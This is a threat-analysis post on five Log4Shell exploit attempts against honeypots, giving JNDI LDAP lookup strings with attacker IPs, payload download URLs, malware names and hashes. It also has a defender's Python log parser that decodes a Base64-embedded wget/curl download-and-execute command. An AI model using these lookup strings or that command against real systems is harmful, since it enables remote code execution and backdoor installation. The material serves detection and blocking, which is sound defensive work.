A look at five Log4J Exploit attempts
Maik Morgenstern
Cybersecurity Leader and Advisor | Former CTO @ AV-TEST | Reverse Engineer
I had a look at some of the #log4j exploit attempts targeting our infrastructure at AV-TEST and our honeypots. I ended up examining five cases a bit more closely: three no longer delivered any payloads, and two still delivered malware.
Analysis of Case 1
Case 1 started with "ldap://139.59.175.247:1389/l6rntj" which loads ExecTemplateJDK8.class seen in the picture below. The Java code tries to download a payload from https://192.99.152.200/ which was already gone at the time of my analysis.
Hashes for ExecTemplateJDK8.class:
MD5: 3fc1e099376eed41851ff8927554d403
SHA1: 08cb932ac7644ca379777b16998d668ab6528ebe
SHA256: cd363b53611e80fa5628a50f19ce491b138c56ed7be59f9f8b46296bd2324727
Static detection by one AV in our test.
Analysis of Case 2
Case 2 started with "ldap://67.205.191.102:1389/koejir" which loads the ExecTemplateJDK7.class seen in the picture below. The Java code tries to download a payload from https://212.47.237.67:443 which was already gone at the time of my analysis.
Hashes for ExecTemplateJDK7.class:
MD5: 855b44aa9a87ac4ca8e740e7f0a2f8aa
SHA1: 6f4858f01196c850278f436c6821e47fdef209f0
SHA256: 38e988a3de71bb3ae8cf33d781c72457ade9c30883402d4e56b14956cddd213a
Static detection by two AVs in our test.
Analysis of Case 3
Case 3 started with "ldap://45.83.193.150:1389/Exploit" which loads the Exploit.class seen in the picture below. The Java code tries to determine whether it is running on Windows or not. If it is not, it will download the payload from "https://68.183.165.105/.l/log".
The Windows payload from "https://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd" was already gone at the time of the analysis. However, there were more files to download in case we are on Linux. See a screenshot of the "log" script. All those files were still available.
pty1 to pty5 are all ELF binaries detected as Backdoor Tsunami by the majority of the 24 AVs we tested. The file named ldm is a shell script also detected as Backdoor by most of the tested AVs. A snippet of its code is shown below.
Hashes for Exploit.class:
MD5: 35697fadc752d99409ccc4c7545d139f
SHA1: bd97f9eba8b7a879d775714ee1a4a815b73fd210
SHA256: 8ad160ddb9d617cf61ff0a7af0fa6d12ae26cf85a5d6e551c617f6c6bb770299
Detected by the majority of the 24 tested AVs as Java Downloader or similar.
To keep it short, here are only the SHA256 hashes for pty1 to pty5, log and ldm.
log: a290b6f956ecdb3d2d2019088f0b01a93a9f680c82a4680c0fb87eb5e3e64897
ldm: 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
pty1: c39eb055c5f71ebfd6881ff04e876f49495c0be5560687586fc47bf5faee0c84
pty2: 33dd6c0af99455a0ca3908c0117e16a513b39fabbf9c52ba24c7b09226ad8626
pty3: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c
pty4: b0a8b2259c00d563aa387d7e1a1f1527405da19bf4741053f5822071699795e2
pty5: 2752deb9f9f9602ca0c7bd41c3171d1560b929b6a4221ab07b0bf872d042f7e7
Analysis of Case 4
Case 4 started with ldap://81.30.157.0:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh, with the actual command encoded as Base64, trying to download the payload from https://155.94.154.170/aaa.
This file aaa is an ELF binary detected as Backdoor Setag or Ganiw by most of the AVs. Hashes are:
MD5: 9ce9b48d008cdfd002d7910bbb484ac2
SHA1: 58cfd7d4ab5e147e1453e7dc588d974f4e7aa456
SHA256: bcfdddb033fb1fa9c73e222919ecd4be071e87b0c54825af516b4f336bc47fa2
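The Case 4 lookup carries its command as a Base64 segment inside the LDAP path, while the other cases carry only a plain lookup string. The following script is an added defender-side example (my own code, not code from the post or from AV-TEST): it pulls such lookups out of web-server log lines, undoes the common ${lower:j}-style nesting, decodes the Base64 command segment and lists the second-stage URLs to block. The log lines are constructed; the embedded lookup strings are the Case 1 and Case 4 strings quoted above.

```python
"""Pull Log4Shell (CVE-2021-44228) lookup strings out of web-server log lines
and turn them into indicators a defender can block or hunt for."""
import base64
import binascii
import re
from typing import Optional

# Constructed sample access-log lines (not from the original post). The two
# JNDI lookup strings embedded in them are the ones the post quotes for Case 1
# and Case 4; the third line is benign traffic to show the parser ignores it.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:10:14:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://139.59.175.247:1389/l6rntj}"',
    '10.0.0.9 - - [12/Dec/2021:03:41:55 +0000] "GET /index HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:ldap://81.30.157.0:1389/Basic/Command/Base64/'
    'd2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh}"',
    '10.0.0.7 - - [12/Dec/2021:03:42:10 +0000] "GET /about HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

# ${lower:j}, ${upper:N} and ${anything:-x} (e.g. ${::-n}, ${env:NOPE:-d}) are the
# usual ways the literal "jndi" is hidden from naive string matching.
_CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^{}])\}', re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r'\$\{[^{}]*:-([^{}])\}')
# After normalisation the lookup has the plain form ${jndi:<scheme>://host:port/path}
_JNDI = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):/*(?P<target>[^}]+)\}', re.IGNORECASE)
# Path layout of the Base64 command variant seen in Case 4 of the post
_B64_CMD = re.compile(r'Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)')
_URL = re.compile(r'''https?://[^\s;"'`]+''')


def normalize(text: str) -> str:
    """Resolve nested lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(r'\1', text)
        text = _DEFAULT_LOOKUP.sub(r'\1', text)
    return text


def decode_b64_command(b64: str) -> Optional[str]:
    """Decode the Base64 command segment, tolerating missing '=' padding."""
    padded = b64 + '=' * (-len(b64) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None


def extract_indicators(line: str) -> list:
    """Return one indicator dict per JNDI lookup found in a single log line."""
    found = []
    for m in _JNDI.finditer(normalize(line)):
        hostport, _, path = m.group('target').partition('/')
        host, _, port = hostport.partition(':')
        ind = {
            'scheme': m.group('scheme').lower(),
            'host': host,
            'port': int(port) if port.isdigit() else None,
            'path': path,
            'command': None,   # decoded second-stage command, if any
            'urls': [],        # URLs the decoded command fetches from
        }
        cmd = _B64_CMD.search(path)
        if cmd:
            ind['command'] = decode_b64_command(cmd.group('b64'))
            if ind['command']:
                ind['urls'] = sorted(set(_URL.findall(ind['command'])))
        found.append(ind)
    return found


def scan(lines) -> list:
    """Scan many log lines; each indicator carries its 1-based line number."""
    results = []
    for n, line in enumerate(lines, start=1):
        for ind in extract_indicators(line):
            ind['line'] = n
            results.append(ind)
    return results


if __name__ == '__main__':
    for ind in scan(SAMPLE_LOGS):
        print(f"line {ind['line']}: {ind['scheme']}://{ind['host']}:{ind['port']}/{ind['path']}")
        if ind['command']:
            print('  decoded command:', ind['command'])
            print('  second-stage URLs:', ind['urls'])
```

The LDAP host and port from each lookup are the first-stage indicators (the attacker's JNDI server), and the URLs recovered from the decoded command are the second-stage hosts; both belong on the block list and in the hunt queries, since the malware stage itself, as the cases above show, is often already gone by the time anyone looks.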
Analysis of Case 5
The fifth and final case started with ldap://92.63.197.53:1389/or2q2y and downloaded ExecTemplateJDK5.class shown in the picture. This code also checks whether it is running on Windows or not and either uses cmd.exe or bash for the further steps.
The payload was already gone at the time of the analysis. Hashes for ExecTemplateJDK5.class are:
MD5: b270fcf523b84fb6a18a648bd6e37cab
SHA1: d9ae46bdc4d187e7552bef9e0ab3197e8a8ffbca
SHA256: ebaf0f578ec615b14c12ed86d136db50b70e3033459d2704a2113f7bdbdf3110
Detected by only one AV.
Security Network Technical Specialist
3 years ago: Which was the AV that detected case 1, case 2 and case 4?
Talks about cybersecurity and Windows Internals
3 years ago: Nice information, thanks for sharing.